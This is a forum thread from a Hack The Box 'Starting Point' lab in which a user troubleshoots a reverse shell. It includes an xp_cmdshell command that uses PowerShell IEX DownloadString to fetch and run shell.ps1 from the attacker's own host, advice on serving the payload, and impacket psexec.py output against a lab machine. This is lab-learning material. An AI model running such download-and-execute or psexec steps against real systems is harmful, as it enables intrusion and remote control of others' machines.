Starting Point reverse shell through xp_cmdshell

xp_cmdshell "powershell "IEX (New-Object
Net.WebClient).DownloadString(\"http://10.10.14.218/shell.ps1\");""
output


Exception calling "DownloadString" with "1" argument(s): "The remote server returned an error: (404) Not Found."

At line:1 char:1

  • IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.218/sh ...

  • ~~~~~~~~~~~~~~~~~

    • CategoryInfo : NotSpecified: (:) [], MethodInvocationException

    • FullyQualifiedErrorId : WebException

NULL

Comments

  • The error message implies that you aren't serving a file called shell.ps1 on your server.

    Make sure wherever you are running the server from has shell.ps1 in the same folder.

    This might also be useful https://forum.hackthebox.eu/discussion/comment/77470

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • I tried that thread earlier but nothing worked
    Also the how to put the file on the server?

    Thank you

  • @TheAnarchist21 said:

    I tried that thread earlier but nothing worked
    Also the how to put the file on the server?

    Ok - just to check I understand the situation:

    • is your IP address (tun0 interface) 10.10.14.218?
    • are you running a webserver on port 80, possibly along the lines of python3 -m http.server 80 or python -m SimpleHTTPServer 80 ?
    • do you have a file called shell.ps1 in the same folder as where you have started the server?

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Yes, my IP address is 10.10.14.218
    pyhton -m http.server 80
    Yes, i redid everything from the start and it worked i don't know how
    Thank you.
    Although I'm stuck now at the psexec.py it's saying that cannot be found or no such file or directory

  • So when it says the file cant be found it generally means some element of the path is incorrect.

    If you are running this on Linux you may (depending on your OS) need to specify the exact location. You can find this with something like locate psexec.py or which psexec.py or even find (find / -name "psexec.py" 2>/dev/null).

    Then if it isnt on your path, you can invoke it by using the full path - for example if it was in /usr/share/some/folder/ you could run it with /usr/share/some/folder/psexec.py

    It may also need python first - so some trial and error is needed.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • I located the file
    and I followed the tutorial

    python3 psexec.py [email protected]

    Traceback (most recent call last):
    File "psexec.py", line 10, in
    import src
    ModuleNotFoundError: No module named 'src'
    This was the result.
    Thank you again.

  • @TheAnarchist21 said:

    I located the file
    and I followed the tutorial

    Awesome

    python3 psexec.py [email protected]

    Traceback (most recent call last):
    File "psexec.py", line 10, in
    import src
    ModuleNotFoundError: No module named 'src'
    This was the result.
    Thank you again.

    So, I suspect this is a version of psexc.py that is set for python2.

    There are a few things to try:

    • first, the default response to a missing python module should be to try and install it (start with pip install src and see if that works)
    • if that doesn't help, try python2 psexec.py [email protected]
    • if that doesnt help try to reinstall the impacket tools.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • So this happened:

    [email protected]:/home/kali/Documents/HackTheBox# python3 psexec.py
    Traceback (most recent call last):
    File "psexec.py", line 10, in
    import src
    ModuleNotFoundError: No module named 'src'
    [email protected]:/home/kali/Documents/HackTheBox#
    [email protected]:/home/kali/Documents/HackTheBox# pip install src
    Collecting src
    Downloading src-0.0.7.zip (6.3 kB)
    Building wheels for collected packages: src
    Building wheel for src (setup.py) ... error
    ERROR: Command errored out with exit status 1:
    command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; file='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' bdist_wheel -d /tmp/pip-wheel-xy366zqw
    cwd: /tmp/pip-install-wqk5cigy/src/
    Complete output (41 lines):
    running bdist_wheel
    running build
    running build_py
    creating build
    creating build/lib
    creating build/lib/src
    copying src/init.py -> build/lib/src
    running egg_info
    writing src.egg-info/PKG-INFO
    writing dependency_links to src.egg-info/dependency_links.txt
    writing entry points to src.egg-info/entry_points.txt
    writing requirements to src.egg-info/requires.txt
    writing top-level names to src.egg-info/top_level.txt
    reading manifest file 'src.egg-info/SOURCES.txt'
    reading manifest template 'MANIFEST.in'
    writing manifest file 'src.egg-info/SOURCES.txt'
    Traceback (most recent call last):
    File "", line 1, in
    File "/tmp/pip-install-wqk5cigy/src/setup.py", line 70, in
    setup(
    File "/usr/lib/python3/dist-packages/setuptools/init.py", line 163, in setup
    return distutils.core.setup(**attrs)
    File "/usr/lib/python3.8/distutils/core.py", line 148, in setup
    dist.run_commands()
    File "/usr/lib/python3.8/distutils/dist.py", line 966, in run_commands
    self.run_command(cmd)
    File "/usr/lib/python3.8/distutils/dist.py", line 985, in run_command
    cmd_obj.run()
    File "/usr/lib/python3/dist-packages/wheel/bdist_wheel.py", line 225, in run
    install = self.reinitialize_command('install',
    File "/usr/lib/python3/dist-packages/setuptools/__init__.py", line 217, in reinitialize_command
    cmd = _Command.reinitialize_command(self, command, reinit_subcommands)
    File "/usr/lib/python3.8/distutils/cmd.py", line 305, in reinitialize_command
    return self.distribution.reinitialize_command(command,
    File "/usr/lib/python3.8/distutils/dist.py", line 950, in reinitialize_command
    for sub in command.get_sub_commands():
    File "/usr/lib/python3.8/distutils/cmd.py", line 324, in get_sub_commands
    if method is None or method(self):
    File "/usr/lib/python3.8/distutils/command/install.py", line 675, in has_lib
    return (self.distribution.has_pure_modules() or
    AttributeError: 'NoneType' object has no attribute 'has_pure_modules'


    ERROR: Failed building wheel for src
    Running setup.py clean for src
    Failed to build src
    Installing collected packages: src
    Running setup.py install for src ... error
    ERROR: Command errored out with exit status 1:
    command: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; file='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' install --record /tmp/pip-record-76hb4euk/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/src
    cwd: /tmp/pip-install-wqk5cigy/src/
    Complete output (2 lines):
    running install
    You've probably made a mistake here and are trying to install from a 'src' directory which doesn't exist.
    ----------------------------------------
    ERROR: Command errored out with exit status 1: /usr/bin/python3 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"'; file='"'"'/tmp/pip-install-wqk5cigy/src/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(file);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, file, '"'"'exec'"'"'))' install --record /tmp/pip-record-76hb4euk/install-record.txt --single-version-externally-managed --compile --install-headers /usr/local/include/python3.8/src Check the logs for full command output.

    thanks again XD

  • Also I tried python2 it didn't work.

  • Ok, then it looks like its the third option. I dont know what else to suggest.

    TazWake

    Happy to help people but PLEASE explain your problem in as much detail as possible!

    Also: https://www.nohello.com/

  • Okay thank you so much.

  • python3.8 psexec.py [email protected]
    Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

    Password:
    [] Requesting shares on 10.10.10.27.....
    [
    ] Found writable share ADMIN$
    [*] Uploading file IiPAmKEF.exe


    and it pauses, don't execute the others operations

Sign In to comment.